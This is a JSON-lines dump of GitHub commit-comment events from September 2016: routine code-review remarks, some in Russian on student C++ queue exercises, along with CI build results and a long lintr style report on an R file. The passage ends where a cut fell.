{"id":"4584932888","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19082645,"position":66,"line":66,"path":"src/BenchmarkDotNet.Core/Engines/Engine.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:07:20Z","updated_at":"2016-09-19T18:07:20Z","body":"does it mean that now the console will be silent until everything gets executed?"}},"created_at":"2016-09-19T18:07:20Z"}
{"id":"4584935810","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19082656,"position":null,"line":null,"path":null,"commit_id":"0a18e95a5619e77f86867e6dfe94556664f4430e","created_at":"2016-09-19T18:07:53Z","updated_at":"2016-09-19T18:07:53Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.772.0a18e95a5619e77f86867e6dfe94556664f4430e](http://build.palaso.org/viewLog.html?buildId=76918&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:06:07"}},"created_at":"2016-09-19T18:07:53Z"}
{"id":"4584936236","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19082658,"position":null,"line":null,"path":null,"commit_id":"0a18e95a5619e77f86867e6dfe94556664f4430e","created_at":"2016-09-19T18:07:57Z","updated_at":"2016-09-19T18:07:57Z","body":"TeamCity libpalaso :: palaso-trusty64-lfmerge Continuous [Build 2.6.71.0a18e95a5619e77f86867e6dfe94556664f4430e](http://build.palaso.org/viewLog.html?buildId=76917&buildTypeId=PalasoPrecise64lfmergeContinuous) outcome was **FAILURE**\nSummary: Tests failed: 4 (4 new), passed: 3466, ignored: 107 Build time: 00:06:17\n### Failed tests\n```\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.ReleaseLock_LockedByActiveProcess_LockFileExists: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcess_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessNotTimedOut_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessTimedOut_ReturnsTrue: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-19T18:07:57Z"}
{"id":"4584938326","type":"CommitCommentEvent","actor":{"login":"donutpixel"},"repo":{"name":"donutpixel/donutpixel.github.io"},"payload":{"comment":{"id":19082668,"position":6,"line":0,"path":"index.html","commit_id":"7c7a1743b14af39d252dd1c67f02847a311dee85","created_at":"2016-09-19T18:08:20Z","updated_at":"2016-09-19T18:08:20Z","body":"If you're looking at this, you can probably see this is a work in progress to create mobile support; the mobile page will be entirely separate and will contain many mobile-optimized projects and other resources "}},"created_at":"2016-09-19T18:08:20Z"}
{"id":"4584940022","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"allevas/ITStep_Lesson_4"},"payload":{"comment":{"id":19082677,"position":36,"line":36,"path":"ex2.cpp","commit_id":"6ece3f06c81354118eb34256d1c3ddc02c1be0e7","created_at":"2016-09-19T18:08:40Z","updated_at":"2016-09-19T18:08:40Z","body":"мне представляется, что при такой реализации очереди в нее нельзя положить 11-й элемент. Например, мы положили 10 элементов и сделали deque. В очереди теперь 9 элементов и есть место для еще одного, 11-го. Но start == 10 и не даст положить новый элемент?"}},"created_at":"2016-09-19T18:08:40Z"}
{"id":"4584941898","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19082685,"position":null,"line":null,"path":null,"commit_id":"0a18e95a5619e77f86867e6dfe94556664f4430e","created_at":"2016-09-19T18:09:00Z","updated_at":"2016-09-19T18:09:00Z","body":"TeamCity libpalaso :: palaso-precise64-libpalaso-2.6 Continuous [Build 2.6.1098.0a18e95a5619e77f86867e6dfe94556664f4430e](http://build.palaso.org/viewLog.html?buildId=76916&buildTypeId=PalasoPrecise64v26Cont) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:07:25"}},"created_at":"2016-09-19T18:09:00Z"}
{"id":"4584942890","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19082692,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T18:09:11Z","updated_at":"2016-09-19T18:09:11Z","body":"''i've checked rild size and it's the aosp version'' = on ur unlocked jflte ?\r\n"}},"created_at":"2016-09-19T18:09:11Z"}
{"id":"4584943190","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"felixonmars/EnergyPlus"},"payload":{"comment":{"id":19082694,"position":null,"line":null,"path":null,"commit_id":"bfaf45db4e0cffc4d85384499dc19286faf82e15","created_at":"2016-09-19T18:09:14Z","updated_at":"2016-09-19T18:09:14Z","body":"patch-1 (felixonmars) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1192 of 1192 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-19T18:09:14Z"}
{"id":"4584946268","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"allevas/ITStep_Lesson_4"},"payload":{"comment":{"id":19082708,"position":319,"line":319,"path":"ex3.cpp","commit_id":"6ece3f06c81354118eb34256d1c3ddc02c1be0e7","created_at":"2016-09-19T18:09:48Z","updated_at":"2016-09-19T18:09:48Z","body":"думаю, что лучше реализовать очередь, используя 2 стека. Тогда и max найти легко, как max по обоим стекам"}},"created_at":"2016-09-19T18:09:48Z"}
{"id":"4584949544","type":"CommitCommentEvent","actor":{"login":"Ste74"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19082718,"position":null,"line":null,"path":null,"commit_id":"c520bf73a35d9528c6b912476a969eace593b3a1","created_at":"2016-09-19T18:10:23Z","updated_at":"2016-09-19T18:10:23Z","body":"@Kirek , but is normal in multiple pkgbuild the replaces array don't work ? I have tried replaces instead of conflicts but don't work :\\\r\nhttps://github.com/manjaro/packages-community/commit/c520bf73a35d9528c6b912476a969eace593b3a1#diff-dcf4539ef22903b38eff365e5481504aR121"}},"created_at":"2016-09-19T18:10:23Z"}
{"id":"4584953605","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"allevas/ITStep_Lesson_4"},"payload":{"comment":{"id":19082731,"position":7,"line":7,"path":"ex5.cpp","commit_id":"6ece3f06c81354118eb34256d1c3ddc02c1be0e7","created_at":"2016-09-19T18:11:04Z","updated_at":"2016-09-19T18:11:04Z","body":"почему вы не хотите возвращать значение напрямую, а в случае ошибки генерировать исключение throw ?"}},"created_at":"2016-09-19T18:11:04Z"}
{"id":"4584956743","type":"CommitCommentEvent","actor":{"login":"imunro"},"repo":{"name":"imperial-photonics/FLIMfit"},"payload":{"comment":{"id":19082734,"position":42,"line":67,"path":"FLIMfitFrontEnd/Classes/@flim_fit_plot_controller/update_plots.m","commit_id":"3130131138ad9ec058a7d05be468d8671a4e2366","created_at":"2016-09-19T18:11:37Z","updated_at":"2016-09-19T18:11:37Z","body":"@seanwarren This hardcoded -20 seems to be causing problems on the mac (see https://github.com/imperial-photonics/FLIMfit/issues/262 )as  I'm getting numbers like -21     0     1     1 back for pos.  I'm not at all sure how to correct though or why 20 ?"}},"created_at":"2016-09-19T18:11:37Z"}
{"id":"4584958924","type":"CommitCommentEvent","actor":{"login":"oyvindln"},"repo":{"name":"oyvindln/deflate-rs"},"payload":{"comment":{"id":19082739,"position":20,"line":23,"path":"benches/bench.rs","commit_id":"0e81c2c0280f89b0262fe5d7b789412b2f9252e5","created_at":"2016-09-19T18:12:01Z","updated_at":"2016-09-19T18:12:01Z","body":"Yup, you're correct."}},"created_at":"2016-09-19T18:12:01Z"}
{"id":"4584959347","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"allevas/ITStep_Lesson_4"},"payload":{"comment":{"id":19082742,"position":42,"line":42,"path":"ex5.cpp","commit_id":"6ece3f06c81354118eb34256d1c3ddc02c1be0e7","created_at":"2016-09-19T18:12:07Z","updated_at":"2016-09-19T18:12:07Z","body":"когда вы пишете большой if-else-if-else - напрашивается написание одного компактного switch. Заведите также enum со значениями - символами ( ) [ ] < > { } и прыгайте по case на нужный символ."}},"created_at":"2016-09-19T18:12:07Z"}
{"id":"4584959912","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeFlixel/flixel"},"payload":{"comment":{"id":19082744,"position":25,"line":131,"path":"flixel/system/debug/watch/EditableTextField.hx","commit_id":"5702c9264ea274df8716b3ace5cc5df85191de78","created_at":"2016-09-19T18:12:13Z","updated_at":"2016-09-19T18:12:13Z","body":"Damnit.. Should really just use `FlxMath.bound()`."}},"created_at":"2016-09-19T18:12:13Z"}
{"id":"4584962038","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"allevas/ITStep_Lesson_4"},"payload":{"comment":{"id":19082746,"position":98,"line":98,"path":"ex6.cpp","commit_id":"6ece3f06c81354118eb34256d1c3ddc02c1be0e7","created_at":"2016-09-19T18:12:33Z","updated_at":"2016-09-19T18:12:33Z","body":"замечания по стилю и реализации те же"}},"created_at":"2016-09-19T18:12:33Z"}
{"id":"4584963475","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19082749,"position":null,"line":null,"path":null,"commit_id":"45eabb9d21469733137a3c01abe7f23243816701","created_at":"2016-09-19T18:12:48Z","updated_at":"2016-09-19T18:12:48Z","body":"Thanks for the valuable feedback Rocky.\r\nIn my local tests even a change of 50 is enough for some Elo changes, however I will take your suggestion and increase the change to have a more noticeable change.\r\n\r\nThanks"}},"created_at":"2016-09-19T18:12:48Z"}
{"id":"4584966631","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19082753,"position":null,"line":null,"path":null,"commit_id":"3af41bf3779e81725265a1bc78b9a6a3bd640b67","created_at":"2016-09-19T18:13:20Z","updated_at":"2016-09-19T18:13:20Z","body":"Wow. Why you could not provide backwards compatiblity for the older version?"}},"created_at":"2016-09-19T18:13:20Z"}
{"id":"4584967016","type":"CommitCommentEvent","actor":{"login":"aliceriot"},"repo":{"name":"mitodl/micromasters"},"payload":{"comment":{"id":19082754,"position":null,"line":null,"path":null,"commit_id":"b99e0d20527782d096a50c01eb11018673213c93","created_at":"2016-09-19T18:13:24Z","updated_at":"2016-09-19T18:13:24Z","body":"@noisecapella it looks like this didn't remove `wowjs` from `npm-shrinkwrap.json`"}},"created_at":"2016-09-19T18:13:24Z"}
{"id":"4584970786","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"allevas/ITStep_Lesson_4"},"payload":{"comment":{"id":19082766,"position":23,"line":23,"path":"ex9.cpp","commit_id":"6ece3f06c81354118eb34256d1c3ddc02c1be0e7","created_at":"2016-09-19T18:14:05Z","updated_at":"2016-09-19T18:14:05Z","body":"пляшут пробелы и табы"}},"created_at":"2016-09-19T18:14:05Z"}
{"id":"4584972588","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19082771,"position":null,"line":null,"path":null,"commit_id":"c520bf73a35d9528c6b912476a969eace593b3a1","created_at":"2016-09-19T18:14:23Z","updated_at":"2016-09-19T18:14:23Z","body":"@Ste74: did you checked it? it normally needs both. **conflicts** and **replaces**."}},"created_at":"2016-09-19T18:14:23Z"}
{"id":"4584972700","type":"CommitCommentEvent","actor":{"login":"dimaShin"},"repo":{"name":"SerhiiZiatko/2_js_tasks"},"payload":{"comment":{"id":19082772,"position":58,"line":58,"path":"main.js","commit_id":"dcdf6d2353a924c95e687e48a6d8d9a2a99e7678","created_at":"2016-09-19T18:14:24Z","updated_at":"2016-09-19T18:14:24Z","body":"посмотри на String.prototype.substring"}},"created_at":"2016-09-19T18:14:24Z"}
{"id":"4584975135","type":"CommitCommentEvent","actor":{"login":"Razzeee"},"repo":{"name":"Razzeee/desktop"},"payload":{"comment":{"id":19082780,"position":23,"line":34,"path":"src/main.js","commit_id":"1092aa3f547efc85f882e7e1c79033b2dcc71662","created_at":"2016-09-19T18:14:48Z","updated_at":"2016-09-19T18:14:48Z","body":"Can you point me to why? I don't understand it as it's using `set` here and it's documented to overwrite the entry https://github.com/Teamwork/node-auto-launch/blob/master/src/AutoLaunchWindows.coffee#L35"}},"created_at":"2016-09-19T18:14:48Z"}
{"id":"4584976772","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19082785,"position":null,"line":null,"path":null,"commit_id":"aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a","created_at":"2016-09-19T18:15:02Z","updated_at":"2016-09-19T18:15:02Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:90:18:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:18:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:13:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:17:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:16:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:16:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:21:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:26:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:16:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L113) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:136:5:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L136) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:137:28:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:137:28:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L137) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:12:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:29:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:149:19:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L149) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:149:19:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L149) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:151:19:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:153:19:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L153) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:181:20:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L181) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:181:20:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L181) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:182:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L182) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:183:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L183) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:184:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L184) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L188) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L189) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L190) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L191) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L193) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:196:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L196) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L198) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:14:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L198) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:14:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L198) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:9:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:27:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L202) 